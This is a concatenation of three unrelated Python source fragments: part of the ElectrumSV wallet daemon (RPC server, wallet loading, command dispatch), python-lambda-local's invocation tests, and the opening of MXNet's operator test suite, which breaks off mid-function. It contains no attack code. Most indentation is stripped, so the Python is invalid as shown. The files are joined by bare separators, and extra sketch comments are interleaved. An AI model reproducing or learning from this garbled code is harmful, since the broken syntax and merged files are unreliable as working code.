rpc_user, rpc_password = get_rpc_credentials(config)
try:
server = VerifyingJSONRPCServer((host, port), logRequests=False,
rpc_user=rpc_user, rpc_password=rpc_password)
except Exception as e:
logger.error('Warning: cannot initialize RPC server on host %s %s', host, e)
self.server = None
os.close(fd)
return
os.write(fd, bytes(repr((server.socket.getsockname(), time.time())), 'utf8'))
os.close(fd)
self.server = server
server.timeout = 0.1
server.register_function(self.ping, 'ping')
server.register_function(self.run_gui, 'gui')
server.register_function(self.run_daemon, 'daemon')
server.register_function(self.run_cmdline, 'run_cmdline')
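    # The lockfile written above is just repr() of ((host, port), timestamp);
    # get_server() parses it back with ast.literal_eval. A round-trip sketch
    # of that encoding (hypothetical values):
    #
    #     payload = (('127.0.0.1', 8888), time.time())
    #     encoded = bytes(repr(payload), 'utf8')   # what init_server writes
    #     (host, port), created = ast.literal_eval(encoded.decode('utf8'))
    #     assert (host, port) == ('127.0.0.1', 8888)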
def init_thread_watcher(self) -> None:
import threading
import sys
import traceback
def _watcher():
while True:
for th in threading.enumerate():
th_text = str(th)
# if "GUI" not in th_text:
# continue
print(th)
traceback.print_stack(sys._current_frames()[th.ident])
print()
time.sleep(5.0)
t = threading.Thread(target=_watcher)
        t.daemon = True
t.start()
def ping(self) -> bool:
return True
def run_daemon(self, config_options: dict) -> Any:
config = SimpleConfig(config_options)
sub = config.get('subcommand')
assert sub in [None, 'start', 'stop', 'status', 'load_wallet', 'close_wallet']
if sub in [None, 'start']:
response = "Daemon already running"
elif sub == 'load_wallet':
path = config.get_cmdline_wallet_filepath()
wallet = self.load_wallet(path) if path is not None else None
self.cmd_runner._wallet = wallet
response = True
elif sub == 'close_wallet':
path = WalletStorage.canonical_path(config.get_cmdline_wallet_filepath())
if path in self.wallets:
self.stop_wallet_at_path(path)
response = True
else:
response = False
elif sub == 'status':
if self.network:
response = self.network.status()
response.update({
'fee_per_kb': self.config.fee_per_kb(),
'path': self.config.path,
'version': PACKAGE_VERSION,
'wallets': {k: w.is_synchronized() for k, w in self.wallets.items()},
})
else:
response = "Daemon offline"
elif sub == 'stop':
self.stop()
response = "Daemon stopped"
return response
def run_gui(self, config_options: dict) -> str:
config = SimpleConfig(config_options)
if hasattr(app_state, 'windows'):
path = config.get_cmdline_wallet_filepath()
app_state.app.new_window(path, config.get('url'))
return "ok"
return "error: ElectrumSV is running in daemon mode; stop the daemon first."
    def load_wallet(self, wallet_filepath: str) -> Optional[Wallet]:
# wizard will be launched if we return
if wallet_filepath in self.wallets:
wallet = self.wallets[wallet_filepath]
return wallet
if not WalletStorage.files_are_matched_by_path(wallet_filepath):
return
storage = WalletStorage(wallet_filepath)
if storage.requires_split():
storage.close()
logger.debug("Wallet '%s' requires an split", wallet_filepath)
return
if storage.requires_upgrade():
storage.close()
logger.debug("Wallet '%s' requires an upgrade", wallet_filepath)
return
wallet = Wallet(storage)
self.start_wallet(wallet)
return wallet
    def get_wallet(self, path: str) -> Optional[Wallet]:
wallet_filepath = WalletStorage.canonical_path(path)
return self.wallets.get(wallet_filepath)
def start_wallet(self, wallet: Wallet) -> None:
# We expect the storage path to be exact, including the database extension. So it should
# match the canonical path used elsewhere.
self.wallets[wallet.get_storage_path()] = wallet
wallet.start(self.network)
def stop_wallet_at_path(self, path: str) -> None:
wallet_filepath = WalletStorage.canonical_path(path)
# Issue #659 wallet may already be stopped.
if wallet_filepath in self.wallets:
wallet = self.wallets.pop(wallet_filepath)
wallet.stop()
def stop_wallets(self):
for path in list(self.wallets.keys()):
self.stop_wallet_at_path(path)
def run_cmdline(self, config_options: dict) -> Any:
password = config_options.get('password')
new_password = config_options.get('new_password')
config = SimpleConfig(config_options)
cmdname = config.get('cmd')
cmd = known_commands[cmdname]
if cmd.requires_wallet:
wallet_path = WalletStorage.canonical_path(config.get_cmdline_wallet_filepath())
wallet = self.wallets.get(wallet_path)
if wallet is None:
return {'error': 'Wallet "%s" is not loaded. Use "electrum-sv daemon load_wallet"'
% get_wallet_name_from_path(wallet_path)}
else:
wallet = None
# arguments passed to function
args = [config.get(x) for x in cmd.params]
# decode json arguments
args = [json_decode(i) for i in args]
# options
kwargs = {}
for x in cmd.options:
kwargs[x] = (config_options.get(x) if x in ['password', 'new_password']
else config.get(x))
cmd_runner = Commands(config, wallet, self.network)
func = getattr(cmd_runner, cmd.name)
result = func(*args, **kwargs)
return result
def on_stop(self):
if self.rest_server and self.rest_server.is_alive:
app_state.async_.spawn_and_wait(self.rest_server.stop)
self.logger.debug("stopped.")
def launch_restapi(self):
if not self.rest_server.is_alive:
self._restapi_future = app_state.async_.spawn(self.rest_server.launcher)
self.rest_server.is_alive = True
def run(self) -> None:
if app_state.config.get("restapi"):
self.launch_restapi()
while self.is_running():
            if self.server:
                self.server.handle_request()
            else:
                time.sleep(0.1)
logger.warning("no longer running")
if self.network:
logger.warning("wait for network shutdown")
self.fx_task.cancel()
app_state.async_.spawn_and_wait(self.network.shutdown_wait)
self.on_stop()
def stop(self) -> None:
logger.warning("stopping")
super().stop()
self.stop_wallets()
remove_lockfile(get_lockfile(self.config))
|
test_direct_invocations.py | '''
python-lambda-local: Test Direct Invocations
(command-line and direct).
Meant for use with py.test.
Copyright 2015-2020 HENNGE K.K. (formerly known as HDE, Inc.)
Licensed under MIT
'''
import json
import argparse
from multiprocessing import Process
import os
from lambda_local.main import run as lambda_run
from lambda_local.main import call as lambda_call
from lambda_local.main import ERR_TYPE_EXCEPTION
from lambda_local.context import Context
def my_lambda_function(event, context):
print("Hello World from My Lambda Function!")
return 42
def my_failing_lambda_function(event, context):
raise Exception('Oh no')
def test_function_call_for_pytest():
(result, error_type) = lambda_call(
my_lambda_function, {}, Context(1))
assert error_type is None
assert result == 42
def test_handle_exceptions_gracefully():
(result, error_type) = lambda_call(
my_failing_lambda_function, {}, Context(1))
assert error_type is ERR_TYPE_EXCEPTION
def test_check_command_line():
request = json.dumps({})
request_file = 'check_command_line_event.json'
with open(request_file, "w") as f:
f.write(request)
args = argparse.Namespace(event=request_file,
file='tests/test_direct_invocations.py',
function='my_lambda_function',
timeout=1,
environment_variables='',
library=None,
version_name='',
arn_string=''
)
p = Process(target=lambda_run, args=(args,))
p.start()
p.join()
os.remove(request_file)
assert p.exitcode == 0
def test_check_command_line_error():
request = json.dumps({})
request_file = 'check_command_line_event.json'
with open(request_file, "w") as f:
f.write(request)
args = argparse.Namespace(event=request_file,
file='tests/test_direct_invocations.py',
function='my_failing_lambda_function',
timeout=1,
environment_variables='',
library=None,
version_name='',
arn_string=''
)
p = Process(target=lambda_run, args=(args,))
p.start()
p.join()
os.remove(request_file)
assert p.exitcode == 1
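# The subprocess pattern above (a sketch of the general idea, independent
# of lambda_local): run a callable in a separate Process so its exit
# status can be observed via exitcode without terminating the test runner.
def _run_and_get_exitcode(target, *args):
    p = Process(target=target, args=args)
    p.start()
    p.join()
    return p.exitcode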
|
test_operator.py | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# pylint: skip-file
from __future__ import print_function
from __future__ import division
import numpy as np
import mxnet as mx
import copy
import math
import random
import itertools
from distutils.version import LooseVersion
from numpy.testing import assert_allclose, assert_array_equal
from mxnet.test_utils import *
from mxnet.operator import *
from mxnet.base import py_str, MXNetError, _as_list
from common import setup_module, with_seed, teardown, assert_raises_cudnn_not_satisfied, assert_raises_cuda_not_satisfied, assertRaises
from common import run_in_spawned_process
from nose.tools import assert_raises, ok_
import unittest
import os
def check_rnn_consistency(cell1, cell2, T, N, I, H, grad_req, rtol=1e-2, atol=1e-4):
dshape = (N, T, I)
data = mx.sym.Variable('data')
Y1, _ = cell1.unroll(T, data, layout='NTC', merge_outputs=True)
mod1 = mx.mod.Module(Y1, label_names=None, context=default_context())
mod1.bind(data_shapes=[('data', dshape)], label_shapes=None, inputs_need_grad=True, grad_req=grad_req)
Y2, _ = cell2.unroll(T, data, layout='NTC', merge_outputs=True)
mod2 = mx.mod.Module(Y2, label_names=None, context=default_context())
mod2.bind(data_shapes=[('data', dshape)], label_shapes=None, inputs_need_grad=True, grad_req=grad_req)
mod1.init_params()
args, auxs = mod1.get_params()
args = cell1.unpack_weights(args)
args = cell2.pack_weights(args)
mod2.set_params(args, auxs)
x = mx.random.uniform(shape=dshape)
batch=mx.io.DataBatch(data=[x])
# check inference
mod1.forward(batch, is_train=False)
mod2.forward(batch, is_train=False)
assert_allclose(mod1.get_outputs()[0].asnumpy(), mod2.get_outputs()[0].asnumpy(), rtol=rtol, atol=atol)
# check training
mod1.forward(batch, is_train=True)
mod2.forward(batch, is_train=True)
assert_allclose(mod1.get_outputs()[0].asnumpy(), mod2.get_outputs()[0].asnumpy(), rtol=rtol, atol=atol)
dy = mx.random.uniform(shape=mod1.get_outputs()[0].shape)
mod1.backward(out_grads=[dy])
mod2.backward(out_grads=[dy])
    if (type(grad_req) is dict and grad_req['data'] == 'null') or grad_req == 'null':
        assert mod1.get_input_grads()[0] is None
        assert mod2.get_input_grads()[0] is None
else:
assert_allclose(mod1.get_input_grads()[0].asnumpy(), mod2.get_input_grads()[0].asnumpy(), rtol=rtol, atol=atol)
@with_seed()
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
def test_rnn_with_new_param():
rnn_modes = ['rnn_relu', 'rnn_tanh', 'gru', 'lstm']
ngates_ = [1, 1, 3, 4]
num_layers, input_size, seq_len, batch_size, state_size = 3, 128, 5, 64, 8
for bidirectional in [False, True]:
directions = 2 if bidirectional else 1
for mode, ngates in zip(rnn_modes, ngates_):
first_layer_size = (input_size * state_size + state_size * state_size + state_size * 2) * ngates
rest_layer_size = (state_size * directions * state_size + state_size * state_size + state_size * 2) \
* ngates * (num_layers - 1)
param_size = (first_layer_size + rest_layer_size) * directions
sym = mx.sym.RNN(mode=mode, num_layers=num_layers, bidirectional=bidirectional,
state_outputs=False, state_size=state_size, name='rnn')
bind_dict = {
'rnn_data': mx.ndarray.random.uniform(low=-1, high=1, shape=(seq_len, batch_size, input_size)),
'rnn_parameters': mx.ndarray.random.uniform(low=-1, high=1, shape=(param_size)),
'rnn_state': mx.ndarray.zeros(shape=(num_layers * directions, batch_size, state_size))
}
if mode == 'lstm':
bind_dict['rnn_state_cell'] = mx.ndarray.zeros(
shape=(num_layers * directions, batch_size, state_size))
ex = sym.bind(default_context(), bind_dict)
ex.forward(is_train=True)
ex01 = ex.output_dict['rnn_output'].asnumpy()
ex.forward(is_train=False)
ex02 = ex.output_dict['rnn_output'].asnumpy()
assert_allclose(ex01, ex02, rtol=1e-2, atol=1e-4)
bind_dict['rnn_parameters'] = mx.ndarray.random.uniform(low=-1, high=1, shape=(param_size))
ex.copy_params_from(bind_dict)
ex.forward(is_train=True)
ex03 = ex.output_dict['rnn_output'].asnumpy()
ex.forward(is_train=False)
ex04 = ex.output_dict['rnn_output'].asnumpy()
assert_allclose(ex03, ex04, rtol=1e-2, atol=1e-4)
@with_seed()
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
def test_lstm_sym():
Ts = [1, 5]
Ns = [1, 32]
Is = [32, 128, 512]
Hs = [32, 128, 512]
for T, N, I, H in itertools.product(Ts, Ns, Is, Hs):
fused = mx.rnn.FusedRNNCell(H, num_layers=3, mode='lstm', get_next_state=True, prefix='')
stack = mx.rnn.SequentialRNNCell()
stack.add(mx.rnn.LSTMCell(H, prefix='l0_'))
stack.add(mx.rnn.LSTMCell(H, prefix='l1_'))
stack.add(mx.rnn.LSTMCell(H, prefix='l2_'))
check_rnn_consistency(fused, stack, T, N, I, H, 'write')
check_rnn_consistency(fused, stack, T, N, I, H, 'add')
check_rnn_consistency(fused, stack, T, N, I, H, 'null')
@with_seed()
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
def test_lstm_bidirectional():
Ts = [1, 5]
Ns = [1, 32]
Is = [32, 128, 512]
Hs = [32, 128, 512]
for T, N, I, H in itertools.product(Ts, Ns, Is, Hs):
fused = mx.rnn.FusedRNNCell(H, num_layers=2, mode='lstm',
bidirectional=True, get_next_state=True, prefix='')
stack = mx.rnn.SequentialRNNCell()
stack.add(mx.rnn.BidirectionalCell(
mx.rnn.LSTMCell(H, prefix='l0_'),
mx.rnn.LSTMCell(H, prefix='r0_'),
output_prefix='bi_lstm_0_'))
stack.add(mx.rnn.BidirectionalCell(
mx.rnn.LSTMCell(H, prefix='l1_'),
mx.rnn.LSTMCell(H, prefix='r1_'),
output_prefix='bi_lstm_1_'))
check_rnn_consistency(fused, stack, T, N, I, H, 'write')
check_rnn_consistency(fused, stack, T, N, I, H, 'add')
check_rnn_consistency(fused, stack, T, N, I, H, 'null')
check_rnn_consistency(fused, stack, T, N, I, H, {'data': 'add', 'parameters': 'null'})
@with_seed()
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
def test_gru_sym():
Ts = [1, 5]
Ns = [1, 32]
Is = [32, 128, 512]
Hs = [32, 128, 512]
for T, N, I, H in itertools.product(Ts, Ns, Is, Hs):
fused = mx.rnn.FusedRNNCell(H, num_layers=3, mode='gru', get_next_state=True, prefix='')
stack = mx.rnn.SequentialRNNCell()
stack.add(mx.rnn.GRUCell(H, prefix='l0_'))
stack.add(mx.rnn.GRUCell(H, prefix='l1_'))
stack.add(mx.rnn.GRUCell(H, prefix='l2_'))
check_rnn_consistency(fused, stack, T, N, I, H, 'write')
check_rnn_consistency(fused, stack, T, N, I, H, 'add')
check_rnn_consistency(fused, stack, T, N, I, H, 'null')
@with_seed()
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
def test_gru_bidirectional():
Ts = [1, 5]
Ns = [1, 32]
Is = [32, 128, 512]
Hs = [32, 128, 512]
for T, N, I, H in itertools.product(Ts, Ns, Is, Hs):
fused = mx.rnn.FusedRNNCell(H, num_layers=2, mode='gru',
bidirectional=True, get_next_state=True, prefix='')
stack = mx.rnn.SequentialRNNCell()
stack.add(mx.rnn.BidirectionalCell(
mx.rnn.GRUCell(H, prefix='l0_'),
mx.rnn.GRUCell(H, prefix='r0_'),
output_prefix='bi_gru_0_'))
stack.add(mx.rnn.BidirectionalCell(
mx.rnn.GRUCell(H, prefix='l1_'),
mx.rnn.GRUCell(H, prefix='r1_'),
output_prefix='bi_gru_1_'))
check_rnn_consistency(fused, stack, T, N, I, H, 'write')
check_rnn_consistency(fused, stack, T, N, I, H, 'add')
check_rnn_consistency(fused, stack, T, N, I, H, 'null')
@with_seed()
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
def test_rnntanh_sym():
Ts = [1, 5]
Ns = [1, 32]
Is = [32, 128, 512]
Hs = [32, 128, 512]
for T, N, I, H in itertools.product(Ts, Ns, Is, Hs):
fused = mx.rnn.FusedRNNCell(H, num_layers=3, mode='rnn_tanh', get_next_state=True, prefix='')
stack = mx.rnn.SequentialRNNCell()
stack.add(mx.rnn.RNNCell(H, activation='tanh', prefix='l0_'))
stack.add(mx.rnn.RNNCell(H, activation='tanh', prefix='l1_'))
stack.add(mx.rnn.RNNCell(H, activation='tanh', prefix='l2_'))
check_rnn_consistency(fused, stack, T, N, I, H, 'write')
check_rnn_consistency(fused, stack, T, N, I, H, 'add')
check_rnn_consistency(fused, stack, T, N, I, H, 'null')
@with_seed()
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
def test_rnntanh_bidirectional():
Ts = [1, 5]
Ns = [1, 32]
Is = [32, 128, 512]
Hs = [32, 128, 512]
for T, N, I, H in itertools.product(Ts, Ns, Is, Hs):
fused = mx.rnn.FusedRNNCell(H, num_layers=2, mode='rnn_tanh',
bidirectional=True, get_next_state=True, prefix='')
stack = mx.rnn.SequentialRNNCell()
stack.add(mx.rnn.BidirectionalCell(
mx.rnn.RNNCell(H, activation='tanh', prefix='l0_'),
mx.rnn.RNNCell(H, activation='tanh', prefix='r0_'),
output_prefix='bi_rnntanh_0_'))
stack.add(mx.rnn.BidirectionalCell(
mx.rnn.RNNCell(H, activation='tanh', prefix='l1_'),
mx.rnn.RNNCell(H, activation='tanh', prefix='r1_'),
output_prefix='bi_rnntanh_1_'))
check_rnn_consistency(fused, stack, T, N, I, H, 'write')
check_rnn_consistency(fused, stack, T, N, I, H, 'add')
check_rnn_consistency(fused, stack, T, N, I, H, 'null')
@with_seed()
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
def test_rnnrelu_sym():
T, N, I, H = 5, 32, 200, 200
fused = mx.rnn.FusedRNNCell(H, num_layers=3, mode='rnn_relu', get_next_state=True, prefix='')
stack = mx.rnn.SequentialRNNCell()
stack.add(mx.rnn.RNNCell(H, activation='relu', prefix='l0_'))
stack.add(mx.rnn.RNNCell(H, activation='relu', prefix='l1_'))
stack.add(mx.rnn.RNNCell(H, activation='relu', prefix='l2_'))
check_rnn_consistency(fused, stack, T, N, I, H, 'write')
check_rnn_consistency(fused, stack, T, N, I, H, 'add')
check_rnn_consistency(fused, stack, T, N, I, H, 'null')
@with_seed()
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
def test_rnnrelu_bidirectional():
Ts = [1, 5]
Ns = [1, 32]
Is = [32, 128, 512]
Hs = [32, 128, 512]
for T, N, I, H in itertools.product(Ts, Ns, Is, Hs):
fused = mx.rnn.FusedRNNCell(H, num_layers=2, mode='rnn_relu',
bidirectional=True, get_next_state=True, prefix='')
stack = mx.rnn.SequentialRNNCell()
stack.add(mx.rnn.BidirectionalCell(
mx.rnn.RNNCell(H, activation='relu', prefix='l0_'),
mx.rnn.RNNCell(H, activation='relu', prefix='r0_'),
output_prefix='bi_rnnrelu_0_'))
stack.add(mx.rnn.BidirectionalCell(
mx.rnn.RNNCell(H, activation='relu', prefix='l1_'),
mx.rnn.RNNCell(H, activation='relu', prefix='r1_'),
output_prefix='bi_rnnrelu_1_'))
check_rnn_consistency(fused, stack, T, N, I, H, 'write', rtol=1e-2, atol=1e-2)
check_rnn_consistency(fused, stack, T, N, I, H, 'add', rtol=1e-2, atol=1e-2)
check_rnn_consistency(fused, stack, T, N, I, H, 'null', rtol=1e-2, atol=1e-2)
@with_seed()
def test_lstm_dropout():
X = mx.sym.Variable('x')
Params = mx.sym.Variable('params')
HX = mx.sym.Variable('state')
CX = mx.sym.Variable('state_cell')
T, N, I, H = 300, 20, 800, 800
rnn = mx.sym.RNN(data=X, parameters=Params, state=HX, state_cell=CX,
state_size=H, num_layers=5, mode='lstm', p=0.5, state_outputs=True, name='LSTM')
exe = rnn.simple_bind(ctx=mx.cpu(), x=(T, N, I))
out = exe.forward(is_train=True)
out[0].wait_to_read()
@with_seed()
def test_gru_dropout():
X = mx.sym.Variable('x')
Params = mx.sym.Variable('params')
HX = mx.sym.Variable('state')
T, N, I, H = 300, 20, 800, 800
rnn = mx.sym.RNN(data=X, parameters=Params, state=HX,
state_size=H, num_layers=5, mode='gru', p=0.5, state_outputs=True, name='GRU')
exe = rnn.simple_bind(ctx=mx.cpu(), x=(T, N, I))
out = exe.forward(is_train=True)
out[0].wait_to_read()
@with_seed()
def test_rnntanh_dropout():
X = mx.sym.Variable('x')
Params = mx.sym.Variable('params')
HX = mx.sym.Variable('state')
T, N, I, H = 300, 20, 800, 800
rnn = mx.sym.RNN(data=X, parameters=Params, state=HX,
state_size=H, num_layers=5, mode='rnn_tanh', p=0.5, state_outputs=True, name='RNN_TANH')
exe = rnn.simple_bind(ctx=mx.cpu(), x=(T, N, I))
out = exe.forward(is_train=True)
out[0].wait_to_read()
@with_seed()
def test_rnnrelu_dropout():
X = mx.sym.Variable('x')
Params = mx.sym.Variable('params')
HX = mx.sym.Variable('state')
T, N, I, H = 300, 20, 800, 800
rnn = mx.sym.RNN(data=X, parameters=Params, state=HX,
state_size=H, num_layers=5, mode='rnn_relu', p=0.5, state_outputs=True, name='RNN_RELU')
exe = rnn.simple_bind(ctx=mx.cpu(), x=(T, N, I))
out = exe.forward(is_train=True)
out[0].wait_to_read()
def test_RNN_float64():
if default_context().device_type == 'gpu':
return
sym = mx.sym.RNN(
mx.sym.Variable('in'),
mx.sym.Variable('par'),
mx.sym.Variable('s'),
state_size = (2),
num_layers = 1,
mode = 'rnn_tanh'
)
dtype = 'float64'
explicit_grad = {
'in': mx.nd.ones([2, 1, 2], dtype=dtype),
'par': mx.nd.ones([12], dtype=dtype),
's': mx.nd.ones([1, 1, 2], dtype=dtype)
}
args_grad = explicit_grad
grad_req = 'write'
ex = sym.bind(default_context(),
{
'in': mx.nd.ones([2, 1, 2], dtype=dtype),
'par': mx.nd.ones([12], dtype=dtype),
's': mx.nd.ones([1, 1, 2], dtype=dtype)
},
args_grad = args_grad,
grad_req = grad_req
)
ex.forward()
ex.outputs[0].wait_to_read()
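# Sanity check for the shape of 'par' above (a sketch, using the fused-RNN
# parameter layout from test_rnn_with_new_param): one unidirectional
# rnn_tanh layer has ngates = 1, so the flat parameter vector holds
# (I*H + H*H + 2*H) * ngates elements; with I = H = 2 that is 12.
def _rnn_tanh_param_count(I, H):
    # input->hidden weights, hidden->hidden weights, two bias vectors
    return I * H + H * H + 2 * H

assert _rnn_tanh_param_count(2, 2) == 12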
def np_softmax(x, axis=-1, temperature=1.0):
x = x - np.max(x, axis=axis, keepdims=True)
x = np.exp(x/temperature)
x /= np.sum(x, axis=axis, keepdims=True)
return x
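# A quick numpy-only check of np_softmax (a sketch, not part of the test
# suite): each row sums to 1, and a higher temperature flattens the
# distribution.
def _check_np_softmax():
    logits = np.array([[1.0, 2.0, 3.0]])
    p1 = np_softmax(logits)
    p5 = np_softmax(logits, temperature=5.0)
    assert np.allclose(p1.sum(axis=-1), 1.0)
    assert p5.max() < p1.max()  # less peaked at higher temperature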
def check_elementwise_sum_with_shape(shape, n):
# forward
inputs = [mx.symbol.Variable('arg%d' % i) for i in range(n)]
out = mx.symbol.ElementWiseSum(*inputs, name='esum')
arr = [mx.nd.empty(shape) for i in range(n)]
arr_grad = [mx.nd.empty(shape) for i in range(n)]
for i in range(n):
arr[i][:] = np.random.uniform(-10, 10, shape)
exec1 = out.bind(default_context(),
args=arr,
args_grad=arr_grad)
exec1.forward(is_train=True)
out1 = exec1.outputs[0]
out = sum(a.asnumpy() for a in arr)
assert_almost_equal(out, out1, rtol=1e-5, atol=1e-5)
out_grad = mx.nd.empty(shape)
out_grad[:] = np.random.uniform(-10, 10, shape)
# backward
exec1.backward([out_grad])
for a in arr_grad:
assert_almost_equal(a, out_grad, rtol=1e-5, atol=1e-5)
@with_seed()
def test_elementwise_sum():
nrepeat = 2
maxdim = 4
for repeat in range(nrepeat):
for dim in range(1, maxdim):
shape = tuple(np.random.randint(1, int(1000**(1.0/dim)), size=dim))
check_elementwise_sum_with_shape(shape, np.random.randint(1, 8))
def check_concat_with_shape(shapes, dimension, skip_second):
# if skip_second is True, second argument will not have gradient.
# it is to test #1130
n = len(shapes)
# forward
target_dim = 0
for shape in shapes:
target_dim += shape[dimension]
inputs = [mx.symbol.Variable('arg%d' % i) for i in range(n)]
out = mx.symbol.Concat(*inputs, name='conc',dim=dimension)
arr = [mx.nd.empty(shape) for shape in shapes]
for i in range(n):
arr[i][:] = shapes[i][dimension]
arr_np = [np.copy(narray.asnumpy()) for narray in arr]
arr_grad = [mx.nd.empty(shape) for shape in shapes]
dict_grad = {}
arg_names = out.list_arguments()
for name, g in zip(arg_names, arr_grad):
if not skip_second or name != 'arg1':
dict_grad[name] = g
args = out.list_arguments()
arg_shapes, out_shapes, aux_shapes = out.infer_shape(**dict(zip(args, shapes)))
out_grad = mx.nd.empty(out_shapes[0])
exec1 = out.bind(default_context(),
args=arr,
args_grad=dict_grad)
exec1.forward(is_train=True)
out1 = exec1.outputs[0]
ret = np.concatenate([narray.asnumpy() for narray in arr], axis=dimension)
assert_almost_equal(out1, ret)
# backward
out1.copyto(out_grad)
out_grad[:] += 1
exec1.backward([out_grad])
for i, name in enumerate(arg_names):
if not skip_second or name != 'arg1':
grad = dict_grad[name]
np_grad = arr_np[i]
assert_almost_equal(grad, np_grad + 1)
@with_seed()
def test_concat():
for dimension in range(4):
n = 2
merge = [2, 3, 4, 5, 6]
a = 2
b = 3
c = 4
# test 2D
if dimension<2:
for dim in range(2, 6):
shapes = []
for i in range(dim):
if dimension == 0:
shapes.append((merge[i], a))
elif dimension == 1:
shapes.append((a, merge[i]))
check_concat_with_shape(shapes,dimension,True)
check_concat_with_shape(shapes,dimension,False)
# Test negative dim
check_concat_with_shape(shapes, dimension - 2, True)
check_concat_with_shape(shapes, dimension - 2, False)
#test 3D
if dimension<3:
for dim in range(2, 6):
shapes = []
for i in range(dim):
if dimension == 0:
shapes.append((merge[i], a,b))
elif dimension ==1:
shapes.append((a,merge[i],b))
elif dimension ==2:
shapes.append((a,b,merge[i]))
check_concat_with_shape(shapes,dimension,True)
check_concat_with_shape(shapes,dimension,False)
# Test negative dim
check_concat_with_shape(shapes, dimension - 3, True)
check_concat_with_shape(shapes, dimension - 3, False)
# test 4D
for dim in range(2, 6):
shapes = []
for i in range(dim):
if dimension == 0:
shapes.append((merge[i],a,b,c))
elif dimension == 1:
shapes.append((a,merge[i],b,c))
elif dimension ==2:
shapes.append((a,b,merge[i],c))
elif dimension ==3:
shapes.append((a,b,c,merge[i]))
check_concat_with_shape(shapes,dimension,True)
check_concat_with_shape(shapes,dimension,False)
# Test negative dim
check_concat_with_shape(shapes, dimension - 4, True)
check_concat_with_shape(shapes, dimension - 4, False)
@with_seed()
def test_slice_channel():
def check_slice_channel(data_ndim, axis, num_outputs, squeeze_axis):
ins = []
if squeeze_axis:
shape = np.random.randint(2, 5, data_ndim).tolist()
shape[axis] = num_outputs
out_ele_shape = [ele for ele in shape]
del out_ele_shape[axis]
else:
shape = np.random.randint(1, 5, data_ndim).tolist()
shape[axis] *= num_outputs
out_ele_shape = [ele for ele in shape]
out_ele_shape[axis] //= num_outputs
data_npy = np.random.normal(size=shape)
out_grads_npy = [np.random.normal(size=out_ele_shape) for i in range(num_outputs)]
data = mx.sym.Variable('data')
sym = mx.sym.SliceChannel(data=data, num_outputs=num_outputs, axis=axis, squeeze_axis=squeeze_axis)
exe = sym.simple_bind(ctx=default_context(), data=data_npy.shape)
assert len(exe.outputs) == num_outputs
outputs = exe.forward(is_train=True, data=data_npy)
for i in range(num_outputs):
            gt = data_npy.take(np.arange(i * shape[axis]/num_outputs,
                                         (i+1) * shape[axis]/num_outputs).astype(int), axis=axis)
if squeeze_axis:
assert_almost_equal(outputs[i], gt.reshape(outputs[i].shape))
else:
assert_almost_equal(outputs[i], gt)
# test backward
exe.backward(out_grads=[mx.nd.array(ele, ctx=default_context()) for ele in out_grads_npy])
if squeeze_axis:
assert_almost_equal(exe.grad_arrays[0],
np.concatenate([np.expand_dims(ele, axis=axis) for ele in out_grads_npy],
axis=axis))
else:
assert_almost_equal(exe.grad_arrays[0],
np.concatenate(out_grads_npy, axis=axis))
check_slice_channel(data_ndim=2, axis=1, num_outputs=3, squeeze_axis=True)
check_slice_channel(data_ndim=4, axis=2, num_outputs=3, squeeze_axis=False)
check_slice_channel(data_ndim=3, axis=-1, num_outputs=2, squeeze_axis=False)
check_slice_channel(data_ndim=5, axis=-2, num_outputs=3, squeeze_axis=True)
@with_seed()
def test_regression():
''' test regression operator '''
def check_regression(symbol, forward, backward, shape, stype='default', densities=[0, 0.5, 1]):
# init executor
data = mx.symbol.Variable('data')
label = mx.symbol.Variable('label', stype=stype)
out = symbol(data, label)
grad_req = {'data': 'write', 'label': 'null'}
out_exec = out.simple_bind(default_context(), grad_req=grad_req,
data=shape, label=shape)
arg_map = dict(zip(out.list_arguments(), out_exec.arg_arrays))
grad_map = dict(zip(out.list_arguments(), out_exec.grad_arrays))
# init data
arr_data = mx.random.uniform(-1, 1, shape)
arg_map["data"][:] = arr_data
# init label based on density
arr_label = arg_map["label"]
atol = 1e-5
for density in densities:
arr_label[:] = rand_ndarray(shape, stype, density=density)
out_exec.forward(is_train=True)
out_exec.backward()
np_out = forward(arr_data.asnumpy())
out_grad = backward(np_out, arr_label.asnumpy().reshape(np_out.shape)) / shape[1]
assert_almost_equal(out_exec.outputs[0], np_out, atol=atol)
assert_almost_equal(grad_map["data"], out_grad, atol=atol)
shape = (50, 30)
check_regression(mx.symbol.LogisticRegressionOutput,
lambda x: 1.0 / (1.0 + np.exp(-x)),
lambda x, y : x - y,
shape)
check_regression(mx.symbol.LinearRegressionOutput,
lambda x: x,
lambda x, y : x - y,
shape)
check_regression(mx.symbol.MAERegressionOutput,
lambda x: x,
lambda x, y : np.where(x > y, np.ones(x.shape), -np.ones(x.shape)),
shape)
check_regression(mx.symbol.LogisticRegressionOutput,
lambda x: 1.0 / (1.0 + np.exp(-x)),
lambda x, y : x - y,
shape, stype='csr')
check_regression(mx.symbol.LinearRegressionOutput,
lambda x: x,
lambda x, y : x - y,
shape, stype='csr')
def check_softmax_grad(xpu):
x = mx.sym.Variable('x')
label = mx.sym.Variable('label')
x_nd = mx.nd.array([[1, 6, 4, 2]], ctx=xpu)
grad_x = mx.nd.zeros((1,4), ctx=xpu)
label_nd = mx.nd.array([1], ctx=xpu)
sym = mx.sym.SoftmaxOutput(data=x, label=label, ignore_label=0, use_ignore=False)
ex = sym.bind(ctx=xpu, args={'x': x_nd, 'label': label_nd}, args_grad={'x': grad_x})
ex.forward(is_train=True)
softmax_out = ex.outputs[0].asnumpy()
expected_softmax_out = [[0.005806628, 0.861780069, 0.116629249, 0.015784052]]
